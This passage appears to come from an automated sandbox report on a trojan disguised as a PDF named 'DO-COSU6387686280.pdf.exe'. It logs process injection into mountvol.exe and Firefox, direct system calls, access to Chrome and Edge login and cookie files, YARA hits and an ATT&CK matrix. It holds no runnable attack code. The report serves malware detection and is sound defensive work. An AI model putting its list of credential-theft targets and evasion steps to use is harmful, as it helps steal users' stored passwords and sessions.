                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE284 mov eax, dword ptr fs:[00000030h]3_2_017CE284
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE284 mov eax, dword ptr fs:[00000030h]3_2_017CE284
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C656A mov eax, dword ptr fs:[00000030h]3_2_017C656A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C656A mov eax, dword ptr fs:[00000030h]3_2_017C656A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C656A mov eax, dword ptr fs:[00000030h]3_2_017C656A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018105A7 mov eax, dword ptr fs:[00000030h]3_2_018105A7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018105A7 mov eax, dword ptr fs:[00000030h]3_2_018105A7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018105A7 mov eax, dword ptr fs:[00000030h]3_2_018105A7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01798550 mov eax, dword ptr fs:[00000030h]3_2_01798550
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01798550 mov eax, dword ptr fs:[00000030h]3_2_01798550
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE53E mov eax, dword ptr fs:[00000030h]3_2_017BE53E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE53E mov eax, dword ptr fs:[00000030h]3_2_017BE53E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE53E mov eax, dword ptr fs:[00000030h]3_2_017BE53E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE53E mov eax, dword ptr fs:[00000030h]3_2_017BE53E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE53E mov eax, dword ptr fs:[00000030h]3_2_017BE53E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0535 mov eax, dword ptr fs:[00000030h]3_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0535 mov eax, dword ptr fs:[00000030h]3_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0535 mov eax, dword ptr fs:[00000030h]3_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0535 mov eax, dword ptr fs:[00000030h]3_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0535 mov eax, dword ptr fs:[00000030h]3_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A0535 mov eax, dword ptr fs:[00000030h]3_2_017A0535
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01826500 mov eax, dword ptr fs:[00000030h]3_2_01826500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864500 mov eax, dword ptr fs:[00000030h]3_2_01864500
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CC5ED mov eax, dword ptr fs:[00000030h]3_2_017CC5ED
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CC5ED mov eax, dword ptr fs:[00000030h]3_2_017CC5ED
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017925E0 mov eax, dword ptr fs:[00000030h]3_2_017925E0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BE5E7 mov eax, dword ptr fs:[00000030h]3_2_017BE5E7
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017965D0 mov eax, dword ptr fs:[00000030h]3_2_017965D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA5D0 mov eax, dword ptr fs:[00000030h]3_2_017CA5D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA5D0 mov eax, dword ptr fs:[00000030h]3_2_017CA5D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE5CF mov eax, dword ptr fs:[00000030h]3_2_017CE5CF
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE5CF mov eax, dword ptr fs:[00000030h]3_2_017CE5CF
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B45B1 mov eax, dword ptr fs:[00000030h]3_2_017B45B1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B45B1 mov eax, dword ptr fs:[00000030h]3_2_017B45B1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CE59C mov eax, dword ptr fs:[00000030h]3_2_017CE59C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C4588 mov eax, dword ptr fs:[00000030h]3_2_017C4588
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01792582 mov eax, dword ptr fs:[00000030h]3_2_01792582
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01792582 mov ecx, dword ptr fs:[00000030h]3_2_01792582
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CAAEE mov eax, dword ptr fs:[00000030h]3_2_017CAAEE
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01790AD0 mov eax, dword ptr fs:[00000030h]3_2_01790AD0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C4AD0 mov eax, dword ptr fs:[00000030h]3_2_017C4AD0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C4AD0 mov eax, dword ptr fs:[00000030h]3_2_017C4AD0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E6ACC mov eax, dword ptr fs:[00000030h]3_2_017E6ACC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E6ACC mov eax, dword ptr fs:[00000030h]3_2_017E6ACC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E6ACC mov eax, dword ptr fs:[00000030h]3_2_017E6ACC
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01798AA0 mov eax, dword ptr fs:[00000030h]3_2_01798AA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01798AA0 mov eax, dword ptr fs:[00000030h]3_2_01798AA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017E6AA4 mov eax, dword ptr fs:[00000030h]3_2_017E6AA4
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183EA60 mov eax, dword ptr fs:[00000030h]3_2_0183EA60
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C8A90 mov edx, dword ptr fs:[00000030h]3_2_017C8A90
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                        NtCreateMutant: Direct from: 0x774635CC
                        NtWriteVirtualMemory: Direct from: 0x77462E3C
                        NtMapViewOfSection: Direct from: 0x77462D1C
                        NtResumeThread: Direct from: 0x774636AC
                        NtProtectVirtualMemory: Direct from: 0x77462F9C
                        NtSetInformationProcess: Direct from: 0x77462C5C
                        NtSetInformationThread: Direct from: 0x774563F9
                        NtNotifyChangeKey: Direct from: 0x77463C2C
                        NtAllocateVirtualMemory: Direct from: 0x77462BFC
                        NtQueryInformationProcess: Direct from: 0x77462C26
                        NtResumeThread: Direct from: 0x77462FBC
                        NtReadFile: Direct from: 0x77462ADC
                        NtQuerySystemInformation: Direct from: 0x77462DFC
                        NtDelayExecution: Direct from: 0x77462DDC
                        NtAllocateVirtualMemory: Direct from: 0x77463C9C
                        NtClose: Direct from: 0x77462B6C
                        NtCreateUserProcess: Direct from: 0x7746371C
                        NtWriteVirtualMemory: Direct from: 0x7746490C
                        NtAllocateVirtualMemory: Direct from: 0x774648EC
                        NtQuerySystemInformation: Direct from: 0x774648CC
                        NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                        NtReadVirtualMemory: Direct from: 0x77462E8C
                        NtCreateKey: Direct from: 0x77462C6C
                        NtSetInformationThread: Direct from: 0x77462B4C
                        NtQueryAttributesFile: Direct from: 0x77462E6C
                        NtDeviceIoControlFile: Direct from: 0x77462AEC
                        NtOpenSection: Direct from: 0x77462E0C
                        NtCreateFile: Direct from: 0x77462FEC
                        NtOpenFile: Direct from: 0x77462DCC
                        NtQueryInformationToken: Direct from: 0x77462CAC
                        NtTerminateThread: Direct from: 0x77462FCC
                        NtAllocateVirtualMemory: Direct from: 0x77462BEC
                        NtOpenKeyEx: Direct from: 0x77462B9C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, Memory written: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, Section loaded: NULL target: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, Section loaded: NULL target: C:\Windows\SysWOW64\mountvol.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\mountvol.exe, Section loaded: NULL target: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe protection: read write
                    Source: C:\Windows\SysWOW64\mountvol.exe, Section loaded: NULL target: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\mountvol.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                    Source: C:\Windows\SysWOW64\mountvol.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\mountvol.exe, Thread register set: target process: 4936
                    Source: C:\Windows\SysWOW64\mountvol.exe, Thread APC queued: target process: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, Process created: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe"
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe, Process created: C:\Windows\SysWOW64\mountvol.exe "C:\Windows\SysWOW64\mountvol.exe"
                    Source: C:\Windows\SysWOW64\mountvol.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: EnLuReulIds.exe, 00000005.00000002.3912862125.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000000.1693038446.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3912966500.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Shell_TrayWnd
                    Source: EnLuReulIds.exe, 00000005.00000002.3912862125.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000000.1693038446.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3912966500.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progman
                    Source: EnLuReulIds.exe, 00000005.00000002.3912862125.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000000.1693038446.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3912966500.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: 0Program Manager
                    Source: EnLuReulIds.exe, 00000005.00000002.3912862125.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000000.1693038446.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3912966500.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, Queries volume information: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe VolumeInformation
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match, File source: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000006.00000002.3913848871.0000000003010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000003.00000002.1770238639.0000000001400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000007.00000002.3916754998.0000000005090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000006.00000002.3913780105.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000003.00000002.1772985722.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000002.3913539434.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0.2.DO-COSU6387686280.pdf.exe.5e30000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.DO-COSU6387686280.pdf.exe.5e30000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000000.00000002.1444908234.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1433265991.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\mountvol.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\mountvol.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                    Source: C:\Windows\SysWOW64\mountvol.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Windows\SysWOW64\mountvol.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\SysWOW64\mountvol.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\mountvol.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                    Source: C:\Windows\SysWOW64\mountvol.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\SysWOW64\mountvol.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Windows\SysWOW64\mountvol.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                    Remote Access Functionality

                    Source: Yara match, File source: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000006.00000002.3913848871.0000000003010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000003.00000002.1770238639.0000000001400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000007.00000002.3916754998.0000000005090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000006.00000002.3913780105.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000003.00000002.1772985722.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000002.3913539434.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0.2.DO-COSU6387686280.pdf.exe.5e30000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.DO-COSU6387686280.pdf.exe.5e30000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000000.00000002.1444908234.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1433265991.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                    | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                    | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 11 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                    | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                    | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                    | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
                    | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                    | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                    | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 14 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                    | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                    | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

                    Behavior Graph (ID: 1562315, Sample: DO-COSU6387686280.pdf.exe, Startdate: 25/11/2024, Architecture: WINDOWS, Score: 100)
                    Process chain: DO-COSU6387686280.pdf.exe (started) -> DO-COSU6387686280.pdf.exe (started) -> EnLuReulIds.exe (injected) -> mountvol.exe (started) -> EnLuReulIds.exe (injected) and firefox.exe (started)

                    | Source | Detection | Scanner | Label | Link |
                    | --- | --- | --- | --- | --- |
                    | DO-COSU6387686280.pdf.exe | 39% | ReversingLabs | Win32.Trojan.Generic | |
                    | DO-COSU6387686280.pdf.exe | 100% | Avira | HEUR/AGEN.1307446 | |
                    | DO-COSU6387686280.pdf.exe | 100% | Joe Sandbox ML | | |
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562315
Start date and time: 2024-11-25 13:54:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DO-COSU6387686280.pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@15/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 96
• Number of non-executed functions: 319
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: DO-COSU6387686280.pdf.exe
Time | Type | Description
07:54:58 | API Interceptor | 1x Sleep call for process: DO-COSU6387686280.pdf.exe modified
07:56:09 | API Interceptor | 9629657x Sleep call for process: mountvol.exe modified
                                                                                      Process:C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.34331486778365
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
